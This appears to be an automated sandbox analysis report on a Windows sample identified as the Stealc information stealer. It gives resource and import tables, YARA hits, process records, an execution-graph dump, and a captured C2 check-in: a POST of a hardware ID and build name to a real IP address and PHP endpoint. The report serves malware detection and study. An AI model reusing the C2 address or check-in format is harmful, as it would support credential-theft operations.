                                   RT_ICON    0x124bc8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  Turkish   Turkey   0.49864620938628157
                                   RT_ICON    0x125470  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors   Turkish   Turkey   0.5253456221198156
                                   RT_ICON    0x125b38  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors   Turkish   Turkey   0.555635838150289
                                  RT_ICON0x1260a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.34854771784232363
                                  RT_ICON0x1286480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37546904315197
                                  RT_ICON0x1296f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.3975409836065574
                                  RT_ICON0x12a0780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4148936170212766
                                  RT_STRING0x12a8600x476data0.44921190893169877
                                  RT_STRING0x12acd80x504data0.45794392523364486
                                  RT_STRING0x12b1e00x6b4data0.4324009324009324
                                  RT_STRING0x12b8980x760data0.4253177966101695
                                  RT_STRING0x12bff80x706data0.42880978865406005
                                  RT_STRING0x12c7000x8b8data0.4211469534050179
                                  RT_STRING0x12cfb80x6d2data0.4306987399770905
                                  RT_STRING0x12d6900x4a4data0.46380471380471383
                                  RT_STRING0x12db380x62edata0.4361567635903919
                                  RT_STRING0x12e1680x520data0.45198170731707316
                                  RT_STRING0x12e6880x722data0.4244249726177437
                                  RT_STRING0x12edb00x564data0.4391304347826087
                                  RT_STRING0x12f3180x2edata0.6304347826086957
                                  RT_GROUP_CURSOR0x12a6880x14data1.15
                                  RT_GROUP_ICON0x11fa280x76dataTurkishTurkey0.6694915254237288
                                  RT_GROUP_ICON0x12a4e00x76dataTurkishTurkey0.6694915254237288
                                  RT_GROUP_ICON0x1191f00x76dataTurkishTurkey0.6610169491525424
                                  RT_GROUP_ICON0x123cb80x68dataTurkishTurkey0.7211538461538461
                                  RT_VERSION0x12a6a00x1bcdata0.581081081081081
                                  DLLImport
                                  KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                  USER32.dllSetFocus
                                  Language of compilation systemCountry where language is spokenMap
                                  TurkishTurkey
                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                   2024-10-08T10:18:27.165792+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 62.122.184.144 | 80 | TCP
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Oct 8, 2024 10:18:26.110294104 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:26.115278006 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:26.115353107 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:26.115472078 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:26.120208979 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:26.820089102 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:26.821371078 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:26.832600117 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:26.838464975 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:27.162113905 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:27.165791988 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:32.168229103 CEST | 80 | 49704 | 62.122.184.144 | 192.168.2.5
                                   Oct 8, 2024 10:18:32.169821024 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Oct 8, 2024 10:18:45.173361063 CEST | 49704 | 80 | 192.168.2.5 | 62.122.184.144
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Oct 8, 2024 10:18:35.310369968 CEST | 53 | 53410 | 1.1.1.1 | 192.168.2.5
                                   • 62.122.184.144
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.5 | 49704 | 62.122.184.144 | 80 | 6480 | C:\Users\user\Desktop\ttFpxuMwKz.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Oct 8, 2024 10:18:26.115472078 CEST | 89 | OUT | GET / HTTP/1.1
                                  Host: 62.122.184.144
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Oct 8, 2024 10:18:26.820089102 CEST | 203 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 08 Oct 2024 08:18:26 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                   Oct 8, 2024 10:18:26.832600117 CEST | 420 | OUT | POST /f88d87a7e087e100.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD
                                  Host: 62.122.184.144
                                  Content-Length: 219
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 36 31 46 44 42 41 44 46 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a
                                  Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="hwid"DE61FDBADFAD2322695909------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="build"default5_pal------JEBKEHJJDAAAAKECBGHD--
                                   Oct 8, 2024 10:18:27.162113905 CEST | 210 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 08 Oct 2024 08:18:26 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=



                                  Target ID:0
                                  Start time:04:18:15
                                  Start date:08/10/2024
                                  Path:C:\Users\user\Desktop\ttFpxuMwKz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\ttFpxuMwKz.exe"
                                  Imagebase:0x400000
                                  File size:336'896 bytes
                                  MD5 hash:56F2A1223362B66CCA9BF86B7CACAD0C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312364166.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2072891062.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:4
                                  Start time:04:18:19
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 804
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:04:18:21
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 812
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:04:18:22
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 836
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:04:18:23
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 844
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:04:18:24
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1040
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:04:18:24
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:16
                                  Start time:04:18:26
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1052
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:18
                                  Start time:04:18:28
                                  Start date:08/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1336
                                  Imagebase:0xb20000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:6.5%
                                    Dynamic/Decrypted Code Coverage:4.9%
                                    Signature Coverage:12.3%
                                    Total number of Nodes:1418
                                    Total number of Limit Nodes:28
34 API calls 26648->26649 26650 402795 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 4027ae 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 4027c7 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 4027e0 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 4027f9 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 402812 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 40282b 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 402844 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 40285d 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 402876 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 40288f 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 4028a8 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 4028c1 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 4028da 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 4028f3 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 40290c 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 402925 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 40293e 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 402957 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 402970 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402989 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 4029a2 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4029bb 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4029d4 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4029ed 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 402a06 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 402a1f 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402a38 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 402a51 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402a6a 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402a83 
26709->26710 26711 4045c0 34 API calls 26710->26711 26712 402a9c 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 402ab5 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 402ace 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 402ae7 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 402b00 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402b19 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402b32 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402b4b 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402b64 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402b7d 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402b96 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402baf 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402bc8 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402be1 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402bfa 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402c13 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402c2c 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402c45 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402c5e 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402c77 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402c90 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402ca9 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402cc2 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402cdb 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402cf4 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402d0d 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402d26 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402d3f 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402d58 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402d71 26769->26770 26771 4045c0 34 API calls 
26770->26771 26772 402d8a 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402da3 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402dbc 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402dd5 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402dee 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402e07 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402e20 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402e39 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402e52 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402e6b 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402e84 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402e9d 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 402eb6 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 402ecf 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 402ee8 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 402f01 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 402f1a 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 402f33 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 402f4c 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 402f65 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 402f7e 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 402f97 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 402fb0 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 402fc9 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 402fe2 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 402ffb 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 403014 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 40302d 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 403046 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 40305f 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 403078 26831->26832 26833 
4045c0 34 API calls 26832->26833 26834 403091 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 4030aa 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 4030c3 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 4030dc 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 4030f5 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 40310e 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 403127 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403140 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403159 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 403172 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 40318b 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 4031a4 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4031bd 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4031d6 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 4031ef 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403208 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403221 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 40323a 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403253 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 40326c 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403285 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 40329e 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4032b7 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4032d0 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 4032e9 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403302 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 40331b 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403334 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 40334d 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403366 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 40337f 
26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403398 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 4033b1 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 4033ca 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 4033e3 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 4033fc 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403415 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 40342e 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403447 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 403460 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403479 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 403492 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 4034ab 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4034c4 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4034dd 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 4034f6 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 40350f 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403528 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 403541 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 40355a 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403573 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 40358c 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 4035a5 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4035be 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4035d7 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 4035f0 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403609 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403622 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 40363b 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403654 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 40366d 26953->26954 26955 4045c0 34 API calls 
26954->26955 26956 403686 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 40369f 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4036b8 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4036d1 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 4036ea 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403703 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 40371c 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403735 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 40374e 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 403767 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 403780 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 403799 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 4037b2 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 4037cb 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4037e4 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 4037fd 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403816 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 40382f 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 403848 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 403861 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 40387a 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403893 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 4038ac 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 4038c5 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4038de 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 4038f7 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 403910 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 403929 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 403942 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 40395b 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 403974 27015->27016 27017 
4045c0 34 API calls 27016->27017 27018 40398d 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 4039a6 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4039bf 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4039d8 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4039f1 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403a0a 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403a23 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403a3c 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403a55 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403a6e 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403a87 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 403aa0 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 403ab9 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403ad2 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 403aeb 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403b04 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403b1d 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403b36 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403b4f 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403b68 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403b81 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403b9a 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403bb3 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403bcc 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403be5 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403bfe 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403c17 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403c30 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403c49 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403c62 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403c7b 
